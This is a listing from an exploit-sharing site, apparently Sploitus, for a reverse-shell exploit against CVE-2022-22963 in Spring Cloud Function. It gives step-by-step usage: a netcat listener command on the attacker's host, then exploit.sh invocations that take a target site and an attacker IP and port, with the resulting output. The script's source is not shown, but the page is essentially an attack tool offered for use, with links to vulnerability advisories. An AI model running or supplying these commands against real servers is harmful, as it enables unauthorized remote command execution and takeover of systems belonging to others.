Exploit for Expression Language Injection in Vmware Spring Cloud Function CVE-2022-22963

Name: Exploit for Expression Language Injection in Vmware Spring Cloud Function CVE-2022-22963
Rating: 5 (174 reviews)

2023-05-25 | CVSS 7.5

## https://sploitus.com/exploit?id=BEC31AE7-B839-564C-9541-59368931D558
# Exploit for RCE in Spring Cloud (CVE 2022-22963)
Exploit for **CVE-2022-22963** remote command execution in Spring Cloud Function

See for details about the vulnerability [**here**](https://www.fastly.com/blog/spring-has-sprung-breaking-down-cve-2022-22963-and-spring4shell-cve-2022) and [**here**](https://spring.io/security/cve-2022-22963)

## PoC

Run the netcat on your host:
``` 
$ nc -lvnp 9001
``` 

Run the exploit (example) with default port **`9001`** on attacker host:
``` 
$ ./exploit.sh site.com 10.10.14.122
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:9001
[*] Done
```
Run the exploit (example) with the specified port **`1337`** on attacker host:
``` 
$ ./exploit.sh site.com 10.10.14.122 1337
---[Reverse Shell Exploit for CVE-2022-22963 (RCE in Spring Cloud Function)]---
[*] Input target is site.com
[*] Input attacker is 10.10.14.122:1337
[*] Done
```